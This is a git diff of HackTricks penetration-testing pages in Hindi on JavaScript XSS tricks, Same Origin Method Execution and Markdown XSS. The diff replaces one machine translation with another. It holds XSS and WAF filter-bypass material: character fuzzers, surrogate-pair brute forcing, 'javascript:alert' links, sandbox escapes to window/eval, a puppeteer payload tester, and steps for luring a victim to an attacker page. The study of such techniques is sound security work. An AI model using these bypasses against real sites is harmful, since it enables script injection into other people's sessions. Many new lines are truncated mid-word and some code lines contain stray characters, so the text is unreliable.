- `\n` - नई पंक्ति वर्ण
- `\r` - कैरिज रिटर्न वर्ण
- `\u2028` - लाइन सेपरेटर वर्ण
- `\u2029` - पैराग्राफ सेपरेटर वर्ण
इन वर्णों का उपयोग करके, आप जेएस कोड में नई पंक्तियों को शामिल कर सकते हैं और इसे अधिक पठनीय बना सकते हैं।
```javascript ```javascript
//Javascript interpret as new line these chars: //Javascript interpret as new line these chars:
String.fromCharCode(10) //0x0a String.fromCharCode(10) //0x0a
@ -96,20 +87,7 @@ console.log(`[${err}]`,j,cmd);
} }
//From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z //From: https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#bounty-pl33z
``` ```
### फंक्शन कॉल में मान्य जेएस स्थान ### फ़ंक्शन कॉल में वैध JS जगह
In JavaScript, function calls can be made using various techniques. One such technique is using valid JS spaces within the function call. This can be done by inserting spaces between the function name and the opening parenthesis, as well as between the closing parenthesis and the semicolon.
For example:
```javascript
alert ('Hello, world!');
```
In the above code, the function `alert` is called with a space between the function name and the opening parenthesis. This is a valid JS space and the function will be executed without any errors.
This technique can be useful in certain scenarios where the application filters out specific characters or keywords but allows spaces. By using valid JS spaces, an attacker can bypass such filters and inject malicious code into the application.
It is important to note that this technique should only be used for educational purposes and with proper authorization. Unauthorized use of this technique can lead to legal consequences.
```javascript ```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition. // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 40-41). Kindle Edition.
@ -126,7 +104,7 @@ log.push(i)
console.log(log)v//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,813 232,8233,8239,8287,12288,65279 console.log(log)v//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,813 232,8233,8239,8287,12288,65279
``` ```
### **स्ट्रिंग उत्पन्न करने के लिए मान्य वर्ण** ### **स्ट्रिंग जेनरेट करने के लिए वैध वर्ण**
```javascript ```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition. // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 41-42). Kindle Edition.
@ -143,7 +121,7 @@ console.log(log) //34,39,47,96
``` ```
### **सरोगेट पेयर्स बीएफ** ### **सरोगेट पेयर्स बीएफ**
यह तकनीक XSS के लिए बहुत उपयोगी नहीं होगी, लेकिन यह WAF संरक्षण को दुर्गम करने के लिए उपयोगी हो सकती है। इस पायथन कोड को दो बाइट के रूप में इनपुट मिलता है और यह उच्च सरोगेट पेयर के अंतिम बाइट के रूप में पहले बाइट और निम्न सरोगेट पेयर के अंतिम बाइट के रूप में अंतिम बाइट रखता है। यह तकनीक XSS के लिए बहुत उपयोगी नहीं होगी लेकिन यह WAF सुरक्षा को उम्मीद से पार करने में मददगार हो सकती है। यह पायथन कोड 2 बाइट के रूप में इनपुट प्राप्त करता है और यह उस सरोगेट पेयर की खोज करता है जिसमें पहला बाइट हाई सरोगेट पेयर के अंतिम बाइट के रूप में होता है और अंतिम बाइट लो सरोगेट पेयर के अंतिम बाइट के रूप में होता है।
```python ```python
def unicode(findHex): def unicode(findHex):
for i in range(0,0xFFFFF): for i in range(0,0xFFFFF):
@ -182,11 +160,7 @@ document.body.append(anchor)
// Another way to test // Another way to test
<a href="&#12;javascript:alert(1337)">Test</a> <a href="&#12;javascript:alert(1337)">Test</a>
``` ```
### URL फज़िलता ### URL फज़िंग
URL फज़िलता एक वेब अनुप्रयोग को परीक्षण करने का एक तकनीक है जिसमें विभिन्न URL पैरामीटरों को अनुमानित मानों के साथ प्रयोग किया जाता है। इसका उपयोग वेब अनुप्रयोगों में संभावित सुरक्षा दुरुपयोगों की खोज करने के लिए किया जाता है। यह तकनीक एक अनुप्रयोग के विभिन्न भागों को परीक्षण करने के लिए उपयोगी हो सकती है, जैसे कि पैरामीटर, पथ, हेडर, कुकीज़, यूआरएल शीर्षक आदि।
यह तकनीक एक अनुप्रयोग के विभिन्न भागों को परीक्षण करने के लिए उपयोगी हो सकती है, जैसे कि पैरामीटर, पथ, हेडर, कुकीज़, यूआरएल शीर्षक आदि। यह तकनीक एक अनुप्रयोग के विभिन्न भागों को परीक्षण करने के लिए उपयोगी हो सकती है, जैसे कि पैरामीटर, पथ, हेडर, कुकीज़, यूआरएल शीर्षक आदि।
```javascript ```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition. // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (pp. 36-37). Kindle Edition.
@ -212,15 +186,7 @@ log.push(i);
} }
console.log(log) //9,10,13,47,92 console.log(log) //9,10,13,47,92
``` ```
### HTML फज़िलता ### HTML फज़िंग
HTML फज़िलता एक टेक्निक है जिसका उपयोग क्रॉस-साइट स्क्रिप्टिंग (XSS) अटैक के लिए किया जाता है। इस तकनीक में, हम विभिन्न HTML टैग और उनके विशेषताओं को अनुकरण करके वेब ऐप्लिकेशन को टेस्ट करते हैं। यह हमें उन टैगों और विशेषताओं की पहचान करने में मदद करता है जिनका उपयोग XSS अटैक के लिए किया जा सकता है।
इस तकनीक का उपयोग करने के लिए, हम विभिन्न HTML टैगों को वेब ऐप्लिकेशन में इंजेक्ट करते हैं और उनका उत्पादन देखते हैं। यदि ऐप्लिकेशन ने इंजेक्टेड टैग को सही ढंग से प्रोसेस किया है, तो उसका उत्पादन ठीक होगा। लेकिन, यदि ऐप्लिकेशन ने इंजेक्टेड टैग को गलत ढंग से प्रोसेस किया है, तो वह XSS अटैक के लिए उपयोगी हो सकता है।
इस तकनीक का उपयोग करने के लिए, हम विभिन्न HTML टैगों को इंजेक्ट करने के लिए विभिन्न तरीकों का उपयोग कर सकते हैं, जैसे कि टैगों को इंजेक्ट करने के लिए इनपुट फ़ील्ड, URL पैरामीटर, या कुकीज़ का उपयोग करना। इसके अलावा, हम विभिन्न विशेषताओं को भी इंजेक्ट कर सकते हैं, जैसे कि इवेंट हैंडलर, स्टाइल आवेदन, या अन्य एट्रिब्यूट्स।
इस तकनीक का उपयोग करके, हम XSS अटैक के लिए उपयोगी टैग और विशेषताओं की पहचान कर सकते हैं और उन्हें एक्सप्लोइट करने के लिए उपयोग कर सकते हैं।
```javascript ```javascript
// Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition. // Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 38). Kindle Edition.
@ -236,29 +202,9 @@ log.push(i);
} }
console.log(log)//33,45,62 console.log(log)//33,45,62
``` ```
## **विश्लेषण गुणों का विश्लेषण** ## **विश्लेषण गुण**
पोर्टस्विगर के टूल **हैकबिलिटी इंस्पेक्टर** जावास्क्रिप्ट ऑब्जेक्ट के **गुणों का विश्लेषण करने** में मदद करता है। जांचें: [https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E](https://portswigger-labs.net/hackability/inspector/?input=x.contentWindow\&html=%3Ciframe%20src=//subdomain1.portswigger-labs.net%20id=x%3E) टूल **Hackability inspector** from Portswigger मदद करता है **विश्लेषण** करने में एक javascript ऑब्ज
## **.map js फ़ाइलें**
* .map js फ़ाइलें डाउनलोड करने के लिए ट्रिक: [https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7](https://medium.com/@bitthebyte/javascript-for-bug-bounty-hunters-part-2-f82164917e7)
* आप इन फ़ाइलों का विश्लेषण करने के लिए इस टूल का उपयोग कर सकते हैं [https://github.com/paazmaya/shuji](https://github.com/paazmaya/shuji)
## "--" असाइनमेंट
डिक्रीमेंट ऑपरेटर `--` भी एक असाइनमेंट है। यह ऑपरेटर एक मान लेता है और उसे एक के रूप में कम कर देता है। यदि वह मान एक नंबर नहीं है, तो यह `NaN` पर सेट किया जाएगा। इसका उपयोग करके **पर्यावरण से चरों की सामग्री को हटाने** के लिए किया जा सकता है।
![](<../../.gitbook/assets/image (553).png>)
![](<../../.gitbook/assets/image (554).png>)
## फ़ंक्शन ट्रिक्स
### .call और .apply
एक फ़ंक्शन का **`.call`** मेथड फ़ंक्शन को **चलाने** के लिए उपयोग किया जाता है।\
यह **पहला तर्क** डिफ़ॉल्ट रूप से **`this` के मान** की उम्मीद करता है और अगर **कुछ नहीं** प्रदान किया गया है, तो **`window`** उस मान की होगी (यहां तक कि **`strict mode`** का उपयोग नहीं हो रहा है)।
```javascript ```javascript
function test_call(){ function test_call(){
console.log(this.value); //baz console.log(this.value); //baz
@ -289,9 +235,9 @@ console.log(this); //[object Window]
} }
test_apply.apply(null, ["arg1", "arg2"]) test_apply.apply(null, ["arg1", "arg2"])
``` ```
### एरो फंक्शन्स ### ऐरो फंक्शन
एरो फंक्शन्स आपको एक ही लाइन में आसानी से फंक्शन बनाने की अनुमति देते हैं (यदि आप उन्हें समझते हैं) ऐरो फंक्शन आपको एक ही लाइन में फंक्शन उत्पन्न करने की अधिक सुविधा प्रदान करते हैं (अगर आप उन्हें समझते हैं)
```javascript ```javascript
// Traditional // Traditional
function (a){ return a + 1; } function (a){ return a + 1; }
@ -314,7 +260,7 @@ let a = 4;
let b = 2; let b = 2;
() => a + b + 1; () => a + b + 1;
``` ```
तो, पिछले अधिकांश फ़ंक्शन वास्तव में अनर्थक है क्योंकि हम उन्हें कहीं नहीं सहेज रहे हैं ताकि हम उन्हें सहेजें और उन्हें कॉल करें। उदाहरण के रूप में `plusone` फ़ंक्शन बनाना: इसलिए, पिछले फ़ंक्शन का अधिकांश वास्तव में अनर्थक है क्योंकि हम उन्हें कहीं सहेजने और उन्हें बुलाने के लिए नहीं बचा रहे हैं। उदाहरण के रूप में `plusone` फ़ंक्शन बनाना:
```javascript ```javascript
// Traductional // Traductional
function plusone (a){ return a + 1; } function plusone (a){ return a + 1; }
@ -324,7 +270,7 @@ plusone = a => a + 100;
``` ```
### बाइंड फंक्शन ### बाइंड फंक्शन
बाइंड फंक्शन का उपयोग करके हम एक **कॉपी** बना सकते हैं एक **फंक्शन को संशोधित करके** **`this`** ऑब्जेक्ट और दिए गए **पैरामीटर** को। बाइंड फंक्शन क**कॉपी बनाने** की अनुमति देती है जो **`this`** ऑब्ज
```javascript ```javascript
//This will use the this object and print "Hello World" //This will use the this object and print "Hello World"
var fn = function ( param1, param2 ) { var fn = function ( param1, param2 ) {
@ -349,12 +295,7 @@ var bindFn_this = fn.bind(this, "fixingparam1");
bindFn_change('Hello', 'World') bindFn_change('Hello', 'World')
``` ```
{% hint style="info" %} {% hint style="info" %}
ध्यान दें कि **`bind`** का उपयोग करके आप उस वस्तु को बदल सकते हैं जो कि फ़ंक्शन को कॉल करते समय उपयोग होगी। ध्यान दें कि **`bind`** का उपयोग करके आप **`this`** ऑब्ज
{% endhint %}
### फ़ंक्शन कोड लीक
यदि आप एक फ़ंक्शन के ऑब्जेक्ट तक पहुंच सकते हैं तो आप उस फ़ंक्शन के कोड को प्राप्त कर सकते हैं।
```javascript ```javascript
function afunc(){ function afunc(){
return 1+1; return 1+1;
@ -364,12 +305,12 @@ console.log(String(afunc)); //This will print the code of the function
console.log(this.afunc.toString()); //This will print the code of the function console.log(this.afunc.toString()); //This will print the code of the function
console.log(global.afunc.toString()); //This will print the code of the function console.log(global.afunc.toString()); //This will print the code of the function
``` ```
ऐसे मामलों में जहां **फ़ंक्शन का कोई नाम नहीं होता है**, आप अभी भी **फ़ंक्शन कोड** को अंदर से प्रिंट कर सकते हैं: उन मामलों में जहां **फ़ंक्शन का कोई नाम नहीं है**, आप फिर भी **फ़ंक्शन कोड** को अंदर से प्रिंट कर सकते हैं:
```javascript ```javascript
(function (){ return arguments.callee.toString(); })() (function (){ return arguments.callee.toString(); })()
(function (){ return arguments[0]; })("arg0") (function (){ return arguments[0]; })("arg0")
``` ```
िसी अन्य फ़ंक्शन से एक फ़ंक्शन के कोड (हमेशा की तरह टिप्पणियाँ सहित) को निकालने के लिए कुछ **यादृच्छिक** तरीके: ुछ **यादृच्छिक** तरीके **कोड** को एक फंक्शन से निकालने के लिए (यहाँ तक की टिप्पणियाँ भी):
```javascript ```javascript
(function (){ return retFunc => String(arguments[0]) })(a=>{/* Hidden commment */})() (function (){ return retFunc => String(arguments[0]) })(a=>{/* Hidden commment */})()
(function (){ return retFunc => Array(arguments[0].toString()) })(a=>{/* Hidden commment */})() (function (){ return retFunc => Array(arguments[0].toString()) })(a=>{/* Hidden commment */})()
@ -377,11 +318,7 @@ console.log(global.afunc.toString()); //This will print the code of the function
(u=>(String(u)))(_=>{ /* Hidden commment */ }) (u=>(String(u)))(_=>{ /* Hidden commment */ })
(u=>_=>(String(u)))(_=>{ /* Hidden commment */ })() (u=>_=>(String(u)))(_=>{ /* Hidden commment */ })()
``` ```
## सैंडबॉक्स छूट - विंडो ऑब्जेक्ट की पुनर्प्राप्ति ## सैंडबॉक्स एस्केप - विंडो ऑब्ज
विंडो ऑब्जेक्ट को अलर्ट या इवैल जैसे वैश्विक रूप से परिभाषित फंक्शन तक पहुंचने की अनुमति देता है।
{% code overflow="wrap" %}
```javascript ```javascript
// Some ways to access window // Some ways to access window
window.eval("alert(1)") window.eval("alert(1)")
@ -423,7 +360,7 @@ with(element) {
``` ```
{% endcode %} {% endcode %}
## मान तक पहुंच पर ब्रेकपॉइंट ## मान तक पहुंचने पर ब्रेकपॉइंट
```javascript ```javascript
// Stop when a property in sessionStorage or localStorage is set/get // Stop when a property in sessionStorage or localStorage is set/get
// via getItem or setItem functions // via getItem or setItem functions
@ -464,36 +401,7 @@ origValue = val;
debugAccess(Object.prototype, 'ppmap') debugAccess(Object.prototype, 'ppmap')
``` ```
## परीक्षण पेलोड के लिए स्वचालित ब्राउज़र एक्सेस ## स्वचालित ब्राउज़र एक्सेस पेयलोड की जांच के लिए
यह तकनीक आपको अपने परीक्षण पेलोड को स्वचालित रूप से ब्राउज़र में एक्सेस करने में मदद करेगी। इसके लिए आपको निम्नलिखित कदमों का पालन करना होगा:
1. एक नया HTML फ़ाइल बनाएं और उसे अपने वेब सर्वर पर होस्ट करें।
2. फ़ाइल में निम्नलिखित कोड जोड़ें:
```html
<script>
// यहां अपना परीक्षण पेलोड डालें
var payload = "<script>alert('XSS');</script>";
// ब्राउज़र एक्सेस के लिए नया विंडो खोलें
var win = window.open("", "_blank");
// विंडो के अंदर HTML डॉक्यूमेंट बनाएं
var doc = win.document.open();
// डॉक्यूमेंट में पेलोड लोड करें
doc.write(payload);
// डॉक्यूमेंट को बंद करें
doc.close();
</script>
```
3. अपने ब्राउज़र में नया टैब खोलें और नया URL दर्ज करें: `http://आपका_वेब_सर्वर/आपकी_फ़ाइल.html`
4. जब आप यह URL खोलेंगे, तो एक नया विंडो खुलेगा और आपका परीक्षण पेलोड उसमें लोड होगा। यदि आपका पेलोड कार्यान्वित होता है, तो एक अलर्ट दिखाई देगा।
इस तकनीक का उपयोग करके आप अपने परीक्षण पेलोड को स्वचालित रूप से ब्राउज़र में एक्सेस कर सकते हैं और XSS के लिए सुरक्षा जांच सकते हैं।
```javascript ```javascript
//Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md //Taken from https://github.com/svennergr/writeups/blob/master/inti/0621/README.md
const puppeteer = require("puppeteer"); const puppeteer = require("puppeteer");
@ -537,10 +445,10 @@ await browser.close();
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके साझा करें** * **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -1,34 +1,30 @@
# SOME - Same Origin Method Execution # कुछ - समान मूल स्थान विधि निष्पादन
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी हैकट्रिक्स में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मेरा** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें और** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **में PR जमा करके**. * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
## Same Origin Method Execution ## समान मूल स्थान विधि निष्पादन
कभी-कभी ऐसे मौके होते हैं जहां आप किसी पेज में कुछ सीमित जावास्क्रिप्ट को निष्पादित कर सकते हैं। उदाहरण के लिए, ऐसे मामले में जहां आप [**किसी कॉलबैक मान को निष्पादित करने का नियंत्रण**](./#javascript-function) कर सकते हैं कभी-कभी ऐसे मौके होते हैं जहां आप पेज में कुछ सीमित जावास्क्रिप्ट को निष्पादित कर सकते हैं। उदाहरण के लिए, उस स्थिति में जहां आप [**कंट्रोल कर सकते हैं एक कॉलबैक मान जो निष्पादित किया जाएगा**](./#javascript-function)
ऐसे मामलों में, आपका सबसे अच्छा काम होगा कि आप **DOM तक पहुंचें और वहां के किसी भी संवेदनशील कार्रवाई को कॉल करें** (जैसे कि बटन पर क्लिक करना)। हालांकि, आमतौर पर आपको इस सुरक्षा दुरुपयोग को **DOM में किसी रोचक चीज के बिना छोटे अंतबिंदुओं में पाएंगे**। उन मामलों में, आपका करने का सबसे अच्छा काम है **DOM तक पहुंचना और वहां कोई भी** संवेदनशील कार्रवाई करना जिसे आप वहां पा सकते हैं (जैसे कि एक बटन पर क्लिक करना)। हालांकि, आम तौर पर आपको यह दोषपूर्णता **छोटे एंडपॉइंट्स में ही मिलेगी जिनमें DOM में कोई दिलचस्प चीज नहीं होगी**।
ऐसे स्थितियों में, यह हमला बहुत उपयोगी होगा, क्योंकि इसका उद्देश्य है कि आप **एक ही डोमेन के अलग पेज से DOM के भीतर सीमित JS निष्पादन का दुरुपयोग कर सकें** और बहुत सारी रोचक कार्रवाइयों को कर सकें उन स्थितियों में, यह हमला बहुत उपयोगी होगा, क्योंकि इसका लक्ष्य है कि आप **एक DOM में सीमित JS निष्पादन का दुरुपयोग कर सकें जो एक ही डोम के अलग पेज से** बहुत दिलचस्प कार्रवाई कर सकता है
मूल रूप से, हमले का फ्लो निम्न है: मूल रूप से, हमले की फ्लो निम्नलिखित है:
* एक **कॉलबैक ढूंढें जिसे आप दुरुपयोग कर सकते हैं** (संभावित रूप से \[\w\\.\_] तक सीमित) * **एक कॉलबैक खोजें जिसे आप दुरुपयोग कर सकते हैं** (संभावित रूप से \[\w\\.\_] तक सीमित)।
* यदि यह सीमित नहीं है और आप कोई भी JS निष्पादित कर सकते हैं, तो आप इसे एक साधारण XSS के रूप में दुरुपयोग कर सकते हैं * यदि यह सीमित नहीं है और आप किसी भी JS को निष्पादित कर सकते हैं, तो आप इसे एक साधारण XSS के रूप में दुरुपयोग कर सकते हैं।
* **पीड़ित व्यक्ति को एक पेज खोलने** के लिए उपयोग करें जिसे **हमलावर नियंत्रण** करता है * **विक्टिम से कहें कि एक पेज खोलें** जिसे **हमलावर नियंत्रित करता है**
* **पेज खुद को खोलें** एक **अलग विंडो में** (नई विंडो में ऑब्जेक्ट **`opener`** को मूल वाले को संदर्भित करेगा) * **पेज खुद को खोलेगा** एक **अलग विंडो में** (नया विंडो में ऑब्जेक्ट **`opener`** प्रारंभिक वाले को संदर्भित करेगा)
* **मूल पेज** वहां स्थित **पेज** लोड करेगा जहां **रोचक DOM** स्थित है। * **प्रारंभिक पेज** वह **पेज** लोड करेगा जहां **दिलचस्प DOM** स्थित है।
* **दूसरा पेज** **कॉलबैक का दुरुपयोग करते हुए विकल्पशील पेज लोड करेगा** और **`opener`** ऑब्जेक्ट का उपयोग करेगा **मूल पेज में कुछ कार्रवाई तक पहुंचने और निष्पादित करने के लिए** (जो अब रोचक DOM को सम्मिलित करता है)। * **दूसरा पेज** **कॉलबैक का दुरुपयोग करते हुए दुरुपयोग करने वाला पेज लोड करेगा** और **`opener`** ऑब्ज
{% hint style="danger" %}
ध्यान दें कि यदि मूल पेज दूसरे पेज को बनाने के बाद नए URL में पहुंचता है, तो दूसरे पेज का **`opener` ऑब्जेक्ट नए DOM में
</details>

View file

@ -4,29 +4,29 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **फॉलो** करें मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PR जमा करके। * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs जमा करके।
</details> </details>
यदि आपको मार्कडाउन में कोड संशोधित करने का मौका मिलता है, तो आप कुछ विकल्प उपयोग कर सकते हैं जिससे कोड को व्याख्या किए जाने पर XSS को ट्रिगर किया जा सकता है यदि आपको मार्कडाउन में कोड इंजेक्शन का मौका मिलता है, तो कोड को अनुप्रेषित होने पर XSS को ट्रिगर करने के लिए आप कुछ विकल्प प्रयोग कर सकते हैं
### HTML टैग ### HTML टैग
